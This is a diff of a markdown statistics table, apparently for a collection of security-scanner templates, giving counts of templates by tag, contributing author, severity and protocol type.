ehsahil | 2 | | | | | | | -| solr | 5 | incogbyte | 2 | | | | | | | -| files | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| ibm | 5 | lu4nx | 2 | | | | | | | -| django | 5 | w4cky_ | 2 | | | | | | | -| circarlife | 5 | hahwul | 2 | | | | | | | -| confluence | 5 | 0xsapra | 2 | | | | | | | -| netgear | 5 | bing0o | 2 | | | | | | | -| fileupload | 5 | davidmckennirey | 2 | | | | | | | -| ssti | 5 | ree4pwn | 2 | | | | | | | -| headless | 5 | swissky | 2 | | | | | | | -| iis | 5 | 0xrudra | 2 | | | | | | | -| laravel | 5 | gevakun | 2 | | | | | | | -| ruijie | 5 | randomrobbie | 2 | | | | | | | -| java | 5 | alifathi-h1 | 2 | | | | | | | -| webserver | 4 | 0xelkomy | 2 | | | | | | | -| docker | 4 | zomsop82 | 2 | | | | | | | -| thinkcmf | 4 | bsysop | 2 | | | | | | | -| deserialization | 4 | 0xcrypto | 2 | | | | | | | -| elastic | 4 | joeldeleep | 2 | | | | | | | -| nodejs | 4 | kiblyn11 | 2 | | | | | | | -| artifactory | 4 | afaq | 2 | | | | | | | -| vpn | 4 | fabaff | 2 | | | | | | | -| thinkphp | 4 | x1m_martijn | 2 | | | | | | | -| asp | 4 | foulenzer | 2 | | | | | | | -| tomcat | 4 | ooooooo_q | 1 | | | | | | | -| solarwinds | 4 | yashgoti | 1 | | | | | | | -| moodle | 4 | _darrenmartyn | 1 | | | | | | | -| jolokia | 4 | knassar702 | 1 | | | | | | | -| traversal | 4 | nytr0gen | 1 | | | | | | | -| samsung | 4 | toufik airane | 1 | | | | | | | -| crlf | 4 | kabirsuda | 1 | | | | | | | -| magmi | 4 | me9187 | 1 | | | | | | | -| hongdian | 4 | huowuzhao | 1 | | | | | | | -| nacos | 3 | th3.d1p4k | 1 | | | | | | | -| bitrix | 3 | bjhulst | 1 | | | | | | | -| oa | 3 | 0h1in9e | 1 | | | | | | | -| targa | 3 | d0rkerdevil | 1 | | | | | | | -| openssh | 3 | philippdelteil | 1 | | | | | | | -| tikiwiki | 3 | raesene | 1 | | | | | | | -| r-seenet | 3 | ohlinge | 1 | | | | | | | -| grafana | 3 | remonsec | 1 | | | | | | | -| terramaster | 3 | makyotox | 1 | | | | | | | -| windows | 3 | qlkwej | 1 | | | | | | | -| lfr | 3 | gal nagli | 1 | | | | | | | -| microstrategy | 3 | pdp | 1 | | | | | | | -| amazon | 3 | ringo | 1 | | | | | | | -| nosqli | 3 | johnk3r | 1 | | | | | | | -| ofbiz | 3 | kurohost | 1 | | | | | | | -| printer | 3 | jeya seelan | 1 | | | | | | | -| log | 3 | shifacyclewla | 1 | | | | | | | -| vbulletin | 3 | j33n1k4 | 1 | | | | | | | -| mongodb | 3 | notsoevilweasel | 1 | | | | | | | -| ebs | 3 | pudsec | 1 | | | | | | | -| hp | 3 | whynotke | 1 | | | | | | | -| cve2010 | 3 | ratnadip gajbhiye | 1 | | | | | | | -| kubernetes | 3 | naglinagli | 1 | | | | | | | -| git | 3 | akash.c | 1 | | | | | | | -| slack | 3 | blckraven | 1 | | | | | | | -| itop | 3 | alex | 1 | | | | | | | -| resin | 3 | luskabol | 1 | | | | | | | -| ssh | 3 | ahmed sherif | 1 | | | | | | | -| backups | 3 | @github.com/defr0ggy | 1 | | | | | | | -| zabbix | 3 | shreyapohekar | 1 | | | | | | | -| bypass | 3 | aceseven (digisec360) | 1 | | | | | | | -| kafka | 3 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| zhiyuan | 3 | thezakman | 1 | | | | | | | -| springcloud | 3 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| fanruan | 3 | regala_ | 1 | | | | | | | -| fpd | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| caucho | 3 | thevillagehacker | 1 | | | | | | | -| prometheus | 2 | juicypotato1 | 1 | | | | | | | -| nextjs | 2 | jteles | 1 | | | | | | | -| sonarqube | 2 | rojanrijal | 1 | | | | | | | -| jsf | 2 | berkdusunur | 1 | | | | | | | -| openfire | 2 | 52971 | 1 | | | | | | | -| waf | 2 | gboddin | 1 | | | | | | | -| kibana | 2 | ldionmarcil | 1 | | | | | | | -| hpe | 2 | sshell | 1 | | | | | | | -| akamai | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| xxljob | 2 | johnjhacking | 1 | | | | | | | -| paloalto | 2 | idealphase | 1 | | | | | | | -| grav | 2 | s1r1u5_ | 1 | | | | | | | -| microsoft | 2 | cookiehanhoan | 1 | | | | | | | -| shellshock | 2 | udyz | 1 | | | | | | | -| sharepoint | 2 | rtcms | 1 | | | | | | | -| mail | 2 | elmahdi | 1 | | | | | | | -| seeyon | 2 | b4uh0lz | 1 | | | | | | | -| dos | 2 | taielab | 1 | | | | | | | -| idrac | 2 | yashanand155 | 1 | | | | | | | -| vrealize | 2 | zhenwarx | 1 | | | | | | | -| emerge | 2 | alph4byt3 | 1 | | | | | | | -| globalprotect | 2 | _harleo | 1 | | | | | | | -| linkerd | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| cve2008 | 2 | fopina | 1 | | | | | | | -| rockmongo | 2 | schniggie | 1 | | | | | | | -| voipmonitor | 2 | kareemse1im | 1 | | | | | | | -| icewarp | 2 | retr0 | 1 | | | | | | | -| keycloak | 2 | bad5ect0r | 1 | | | | | | | -| cache | 2 | flag007 | 1 | | | | | | | -| rstudio | 2 | noamrathaus | 1 | | | | | | | -| odoo | 2 | geraldino2 | 1 | | | | | | | -| yapi | 2 | andirrahmani1 | 1 | | | | | | | -| natshell | 2 | manuelbua | 1 | | | | | | | -| strapi | 2 | smaranchand | 1 | | | | | | | -| trixbox | 2 | arcc | 1 | | | | | | | -| jeedom | 2 | dawid czarnecki | 1 | | | | | | | -| leak | 2 | soyelmago | 1 | | | | | | | -| github | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| mida | 2 | mhdsamx | 1 | | | | | | | -| akkadian | 2 | rodnt | 1 | | | | | | | -| kevinlab | 2 | un-fmunozs | 1 | | | | | | | -| splunk | 2 | micha3lb3n | 1 | | | | | | | -| horde | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| chamilo | 2 | sickwell | 1 | | | | | | | -| kentico | 2 | apt-mirror | 1 | | | | | | | -| frp | 2 | vzamanillo | 1 | | | | | | | -| igs | 2 | @dwisiswant0 | 1 | | | | | | | -| openam | 2 | sullo | 1 | | | | | | | -| telerik | 2 | yavolo | 1 | | | | | | | -| smtp | 2 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | andré monteiro | | | | | | | | -| | | @am0nt31r0 | | | | | | | | -| jellyfin | 2 | c3l3si4n | 1 | | | | | | | -| flir | 2 | hakluke | 1 | | | | | | | -| ucmdb | 2 | zandros0 | 1 | | | | | | | -| cve2007 | 2 | bernardofsr | 1 | | | | | | | -| injection | 2 | ajaysenr | 1 | | | | | | | -| plesk | 2 | elder tao | 1 | | | | | | | -| oauth | 2 | absshax | 1 | | | | | | | -| nexus | 2 | wabafet | 1 | | | | | | | -| phpcollab | 2 | affix | 1 | | | | | | | -| wordfence | 2 | 0xtavian | 1 | | | | | | | -| maian | 2 | furkansenan | 1 | | | | | | | -| httpd | 2 | iampritam | 1 | | | | | | | -| chiyu | 2 | revblock | 1 | | | | | | | -| glassfish | 2 | dogasantos | 1 | | | | | | | -| status | 2 | streetofhackerr007 | 1 | | | | | | | -| webcam | 2 | divya_mudgal | 1 | | | | | | | -| showdoc | 2 | 0xteles | 1 | | | | | | | -| spark | 2 | fmunozs | 1 | | | | | | | -| fortios | 2 | akshansh | 1 | | | | | | | -| hasura | 2 | _c0wb0y_ | 1 | | | | | | | -| hashicorp | 2 | ipanda | 1 | | | | | | | -| sonicwall | 2 | b0yd | 1 | | | | | | | -| pega | 2 | deena | 1 | | | | | | | -| wp-theme | 2 | andysvints | 1 | | | | | | | -| nagios | 2 | abison_binoy | 1 | | | | | | | -| ecology | 2 | luci | 1 | | | | | | | -| rockethchat | 2 | mohammedsaneem | 1 | | | | | | | -| dolibarr | 2 | 0xrod | 1 | | | | | | | -| service | 2 | omarkurt | 1 | | | | | | | -| jboss | 2 | 0ut0fb4nd | 1 | | | | | | | -| saltstack | 2 | chron0x | 1 | | | | | | | -| smb | 2 | kba@sogeti_esec | 1 | | | | | | | -| bigip | 2 | its0x08 | 1 | | | | | | | -| activemq | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| proxy | 2 | ilovebinbash | 1 | | | | | | | -| hjtcloud | 2 | sy3omda | 1 | | | | | | | -| huawei | 2 | petruknisme | 1 | | | | | | | -| wso2 | 2 | aresx | 1 | | | | | | | -| intrusive | 2 | daviey | 1 | | | | | | | -| couchdb | 2 | mubassirpatel | 1 | | | | | | | -| erp-nc | 1 | alperenkesk | 1 | | | | | | | -| yii | 1 | mah3sec_ | 1 | | | | | | | -| lutron | 1 | undefl0w | 1 | | | | | | | -| dvwa | 1 | patralos | 1 | | | | | | | -| heroku | 1 | exploitation | 1 | | | | | | | -| zarafa | 1 | defr0ggy | 1 | | | | | | | -| expressjs | 1 | becivells | 1 | | | | | | | -| openrestry | 1 | bolli95 | 1 | | | | | | | -| seacms | 1 | hanlaomo | 1 | | | | | | | -| mpsec | 1 | tirtha_mandal | 1 | | | | | | | -| phalcon | 1 | sicksec | 1 | | | | | | | -| clave | 1 | tim_koopmans | 1 | | | | | | | -| scimono | 1 | willd96 | 1 | | | | | | | -| wondercms | 1 | r3naissance | 1 | | | | | | | -| swagger | 1 | shelld3v | 1 | | | | | | | -| visualtools | 1 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| javascript | 1 | co0nan | 1 | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| guacamole | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| axis | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------|-------|--------------------------------|-------|-----------|-------|----------|-------|---------|-------| +| cve | 576 | pikpikcu | 234 | Users | 1828 | info | 577 | http | 1696 | +| panel | 214 | dhiyaneshdk | 234 | | | high | 457 | file | 46 | +| xss | 213 | pdteam | 191 | | | medium | 385 | network | 35 | +| wordpress | 198 | daffainfo | 128 | | | critical | 218 | dns | 11 | +| exposure | 196 | dwisiswant0 | 127 | | | low | 156 | | | +| rce | 183 | geeknik | 127 | | | | | | | +| lfi | 168 | gy741 | 62 | | | | | | | +| cve2020 | 155 | madrobot | 60 | | | | | | | +| wp-plugin | 133 | princechaddha | 53 | | | | | | | +| tech | 100 | gaurang | 42 | | | | | | | +| cve2021 | 92 | pussycat0x | 40 | | | | | | | +| config | 91 | ice3man | 26 | | | | | | | +| cve2019 | 86 | organiccrap | 24 | | | | | | | +| cve2018 | 74 | 0x_akoko | 23 | | | | | | | +| takeover | 73 | philippedelteil | 17 | | | | | | | +| | 65 | sheikhrishad | 15 | | | | | | | +| token | 64 | milo2012 | 14 | | | | | | | +| apache | 64 | techbrunchfr | 13 | | | | | | | +| default-login | 54 | pr3r00t | 13 | | | | | | | +| cve2017 | 47 | suman_kar | 12 | | | | | | | +| file | 46 | cyllective | 11 | | | | | | | +| iot | 44 | righettod | 10 | | | | | | | +| unauth | 42 | random_robbie | 10 | | | | | | | +| oob | 41 | hackergautam | 9 | | | | | | | +| sqli | 35 | r3dg33k | 9 | | | | | | | +| network | 35 | wdahlenb | 9 | | | | | | | +| ssrf | 30 | melbadry9 | 8 | | | | | | | +| cve2016 | 30 | that_juan_ | 8 | | | | | | | +| logs | 29 | aashiq | 8 | | | | | | | +| oracle | 29 | nadino | 8 | | | | | | | +| workflow | 29 | iamthefrogy | 8 | | | | | | | +| misc | 27 | 0x240x23elu | 7 | | | | | | | +| jira | 26 | kophjager007 | 7 | | | | | | | +| atlassian | 26 | oppsec | 7 | | | | | | | +| redirect | 25 | emadshanab | 7 | | | | | | | +| listing | 24 | harshbothra_ | 7 | | | | | | | +| aem | 19 | randomstr1ng | 7 | | | | | | | +| cisco | 18 | dr_set | 7 | | | | | | | +| cve2015 | 18 | techryptic (@tech) | 7 | | | | | | | +| sap | 18 | caspergn | 6 | | | | | | | +| disclosure | 17 | puzzlepeaches | 6 | | | | | | | +| springboot | 15 | __fazal | 6 | | | | | | | +| cve2014 | 14 | panch0r3d | 5 | | | | | | | +| cve2012 | 14 | joanbono | 5 | | | | | | | +| debug | 14 | yanyun | 5 | | | | | | | +| cve2011 | 13 | meme-lord | 5 | | | | | | | +| android | 13 | pentest_swissky | 5 | | | | | | | +| auth-bypass | 13 | iamnoooob | 5 | | | | | | | +| misconfig | 13 | ganofins | 5 | | | | | | | +| struts | 13 | rootxharsh | 5 | | | | | | | +| weblogic | 12 | e_schultze_ | 4 | | | | | | | +| dlink | 12 | github.com/its0x08 | 4 | | | | | | | +| adobe | 12 | xelkomy | 4 | | | | | | | +| jenkins | 12 | elsfa7110 | 4 | | | | | | | +| dns | 12 | nodauf | 4 | | | | | | | +| joomla | 11 | jarijaas | 3 | | | | | | | +| devops | 11 | tess | 3 | | | | | | | +| php | 11 | emenalf | 3 | | | | | | | +| zoho | 11 | dudez | 3 | | | | | | | +| cve2013 | 11 | z3bd | 3 | | | | | | | +| router | 11 | fyoorer | 3 | | | | | | | +| fuzz | 11 | impramodsargar | 3 | | | | | | | +| magento | 9 | _generic_human_ | 3 | | | | | | | +| xxe | 8 | f1tz | 3 | | | | | | | +| cnvd | 8 | shifacyclewala | 3 | | | | | | | +| aws | 8 | thomas_from_offensity | 3 | | | | | | | +| gitlab | 8 | shine | 3 | | | | | | | +| airflow | 8 | vsh00t | 3 | | | | | | | +| ftp | 8 | 0w4ys | 3 | | | | | | | +| rails | 8 | mavericknerd | 3 | | | | | | | +| ruijie | 8 | binaryfigments | 3 | | | | | | | +| login | 7 | yash anand @yashanand155 | 3 | | | | | | | +| nginx | 7 | amsda | 2 | | | | | | | +| vmware | 7 | fabaff | 2 | | | | | | | +| scada | 7 | udit_thakkur | 2 | | | | | | | +| cve2009 | 7 | lu4nx | 2 | | | | | | | +| backup | 6 | manas_harsh | 2 | | | | | | | +| solr | 6 | x1m_martijn | 2 | | | | | | | +| api | 6 | 0xprial | 2 | | | | | | | +| google | 6 | swissky | 2 | | | | | | | +| jetty | 6 | unstabl3 | 2 | | | | | | | +| cms | 6 | zomsop82 | 2 | | | | | | | +| dell | 6 | foulenzer | 2 | | | | | | | +| citrix | 6 | w4cky_ | 2 | | | | | | | +| coldfusion | 6 | vavkamil | 2 | | | | | | | +| rconfig | 6 | 0xrudra | 2 | 